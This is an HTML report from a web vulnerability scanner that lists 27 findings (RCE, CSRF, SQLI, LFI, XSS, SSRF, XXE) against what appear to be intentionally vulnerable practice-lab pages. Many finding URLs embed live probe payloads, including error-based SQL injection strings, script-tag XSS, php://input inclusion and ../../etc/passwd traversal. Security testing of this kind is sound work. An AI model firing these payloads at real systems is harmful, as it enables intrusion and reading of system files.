<!DOCTYPE html>
<html>
<head>
    <title>webScanner Report</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <style>
        body {
            margin: 0;
            font-family: "Trebuchet MS", Arial, Helvetica, sans-serif;
        }

        a {
            text-decoration: none;
        }

        .navbar {
            background-color: #0b77df;
            position: fixed;
            top: 0;
            width: 100%;
            height: 60px;
        }

        #logo {
            margin: 20px 0px 20px 20px;
        }

        .table {
            margin-top: 70px;
            padding: 10px 20px 10px 20px;
        }

        #table {
            border-collapse: collapse;
            width: 100%;
            table-layout: fixed;
            word-break: break-all
        }

        #table td, #table th {
            border: 1px solid #ddd;
            padding: 4px;
        }

        #table tr.table-item:hover {
            background-color: #ddd;
        }

        #table tr.table-item {
            cursor: pointer;
        }

        #table th {
            padding-top: 8px;
            padding-bottom: 8px;
            border: 1px solid #eee;
            background-color: #ddd;
            color: black;
            text-align: left;
        }

        .detail-item {
            margin: 5px;
        }

        [class^="table-detail-"] {
            display: none;
        }

        pre {
            margin: 1px;
        }

        .footer {
            padding: 10px 20px 10px 20px;
        }

        .feedback {
            font-size: 80%;
        }

        .modal {
            display: none; /* Hidden by default */
            position: fixed; /* Stay in place */
            z-index: 1; /* Sit on top */
            padding-top: 100px; /* Location of the box */
            left: 0;
            top: 0;
            width: 100%; /* Full width */
            height: 100%; /* Full height */
            overflow: auto; /* Enable scroll if needed */
            background-color: rgb(0, 0, 0); /* Fallback color */
            background-color: rgba(0, 0, 0, 0.4); /* Black w/ opacity */
        }

        .modal-content {
            background-color: #fefefe;
            margin: auto;
            padding: 20px 20px 70px 20px;
            border: 1px solid #888;
            width: 50%;
        }

        .button {
            border: none;
            color: white;
            padding: 10px 15px;
            text-align: center;
            text-decoration: none;
            display: inline-block;
            font-size: 16px;
            margin: 4px 2px;
            cursor: pointer;
        }

        .feedback-submit-btn {
            background-color: #4CAF50;
            float: right;
        }

        .feedback-cancel-btn {
            background-color: darkgray;
            float: right;
        }

        #feedback-comment {
            width: 100%;
            border: 1px solid black;
        }

    </style>
    <link href="https://cdn.bootcss.com/prism/9000.0.1/themes/prism.min.css" rel="stylesheet">
    <script src="https://cdn.bootcss.com/prism/9000.0.1/prism.min.js" data-manual></script>
    <script src="https://cdn.bootcss.com/prism/9000.0.1/components/prism-http.min.js"></script>
    <script src="https://cdn.bootcss.com/prism/9000.0.1/components/prism-javascript.min.js"></script>
    <style>
        pre[class*="language-"] {
            padding: .5em;
            margin: .5em 0;
            overflow: auto;
            max-height: 300px;
        }

        pre[class*="language-"] {
            background: white;
        }
    </style>
</head>
<body>
<div class="navbar">
    <h1 style="color: #eee;">Web Scanner</h1>
</div>
<div class="table">
    <table id="table">
    <tr><th colspan="1">#</th>
        <th colspan="3">Plugin / VulnType</th>
        <th colspan="6">Target</th>
    </tr>
            <tr>
            <td colspan="1">1</td>
            <td colspan="3">RCE</td>
            <td colspan="6">http://www.ch4ser.top:82/vulnerabilities/exec/index.php</td>
        </tr>
        <tr>
            <td colspan="1">2</td>
            <td colspan="3">CSRF</td>
            <td colspan="6">http://www.ch4ser.top:82/vulnerabilities/csrf/?password_new=hello&password_conf=hello&Change=Change#</td>
        </tr>
        <tr>
            <td colspan="1">3</td>
            <td colspan="3">CSRF</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/csrf/csrfget/csrf_get_edit.php?sex=1&phonenum=1&add=1&email=ef775988943825d2871e1cfa75473ec&submit=submit</td>
        </tr>
        <tr>
            <td colspan="1">4</td>
            <td colspan="3">CSRF</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/csrf/csrfget/csrf_get_edit.php?sex=1&phonenum=1&add=1&email=ef775988943825d2871e1cfa75473ec&submit=submit</td>
        </tr>
        <tr>
            <td colspan="1">5</td>
            <td colspan="3">CSRF</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/csrf/csrfpost/csrf_post_edit.php</td>
        </tr>
        <tr>
            <td colspan="1">6</td>
            <td colspan="3">SQLI</td>
            <td colspan="6">http://www.ch4ser.top:82/vulnerabilities/sqli/index.php?id=1' union select extractvalue(1,concat(0x7e,md5(99999999)))#&Submit=Submit</td>
        </tr>
        <tr>
            <td colspan="1">7</td>
            <td colspan="3">LFI</td>
            <td colspan="6">http://www.ch4ser.top:82/vulnerabilities/fi/?page=../../../../../../etc/passwd</td>
        </tr>
        <tr>
            <td colspan="1">8</td>
            <td colspan="3">LFI</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/fileinclude/fi_local.php?filename=../../../../etc/passwd&submit=提交</td>
        </tr>
        <tr>
            <td colspan="1">9</td>
            <td colspan="3">LFI</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/fileinclude/fi_remote.php?filename=php://input&submit=111</td>
        </tr>
        <tr>
            <td colspan="1">10</td>
            <td colspan="3">XSS</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/xss/xss_01.php?message=%3cSCRIPT%3ealert(2222)%3c%2FsCRIpt%3e&submit=submit</td>
        </tr>
        <tr>
            <td colspan="1">11</td>
            <td colspan="3">XSS</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/xss/xss_03.php?message=javascript%3Aalert(href-xss)&submit=submit</td>
        </tr>
        <tr>
            <td colspan="1">12</td>
            <td colspan="3">XSS</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/xss/xss_04.php?message=%27%3c%2Fscript%3e%3cscript%3ealert(%27jsoutput-xss%27)%3c%2Fscript%3e&submit=submit</td>
        </tr>
        <tr>
            <td colspan="1">13</td>
            <td colspan="3">path traversal</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/dir/dir_list.php?title=../../../../etc/passwd</td>
        </tr>
        <tr>
            <td colspan="1">14</td>
            <td colspan="3">RCE</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/rce/rce_eval.php</td>
        </tr>
        <tr>
            <td colspan="1">15</td>
            <td colspan="3">RCE</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/rce/rce_ping.php</td>
        </tr>
        <tr>
            <td colspan="1">16</td>
            <td colspan="3">SQLI</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/sqli/sqli_del.php?id=1%20and%20extractvalue(1,concat(0x3a,md5(99999999)))</td>
        </tr>
        <tr>
            <td colspan="1">17</td>
            <td colspan="3">SQLI</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/sqli/sqli_header/sqli_header_login.php</td>
        </tr>
        <tr>
            <td colspan="1">18</td>
            <td colspan="3">SQLI</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/sqli/sqli_id.php</td>
        </tr>
        <tr>
            <td colspan="1">19</td>
            <td colspan="3">SQLI</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/sqli/sqli_search.php?name=admin%25%27%20union%20select%20user(),extractvalue(1,concat(0x7e,md5(99999999))),3%23&submit=submit</td>
        </tr>
        <tr>
            <td colspan="1">20</td>
            <td colspan="3">SQLI</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/sqli/sqli_widebyte.php</td>
        </tr>
        <tr>
            <td colspan="1">21</td>
            <td colspan="3">SQLI</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/sqli/sqli_x.php?name=%27)%20and%20extractvalue(1,concat(0x7e,md5(99999999)))%23&submit=查询</td>
        </tr>
        <tr>
            <td colspan="1">22</td>
            <td colspan="3">SSRF</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/ssrf/ssrf_curl.php?url=http://www.baidu.com</td>
        </tr>
        <tr>
            <td colspan="1">23</td>
            <td colspan="3">SSRF</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/ssrf/ssrf_fgc.php?file=php://input</td>
        </tr>
        <tr>
            <td colspan="1">24</td>
            <td colspan="3">xss</td>
            <td colspan="6">http://www.ch4ser.top:82//vul/xss/xss_stored.php</td>
        </tr>
        <tr>
            <td colspan="1">25</td>
            <td colspan="3">LFI</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/unsafedownload/execdownload.php?filename=../../../../etc/passwd</td>
        </tr>
        <tr>
            <td colspan="1">26</td>
            <td colspan="3">XSS</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/xss/xss_01.php?message=%3cscrIPt%3ealert(1)%3c%2FscrIpt%3e&submit=submit</td>
        </tr>
        <tr>
            <td colspan="1">27</td>
            <td colspan="3">XXE</td>
            <td colspan="6">http://www.ch4ser.top:82/vul/xxe/xxe_1.php</td>
        </tr>
</div>

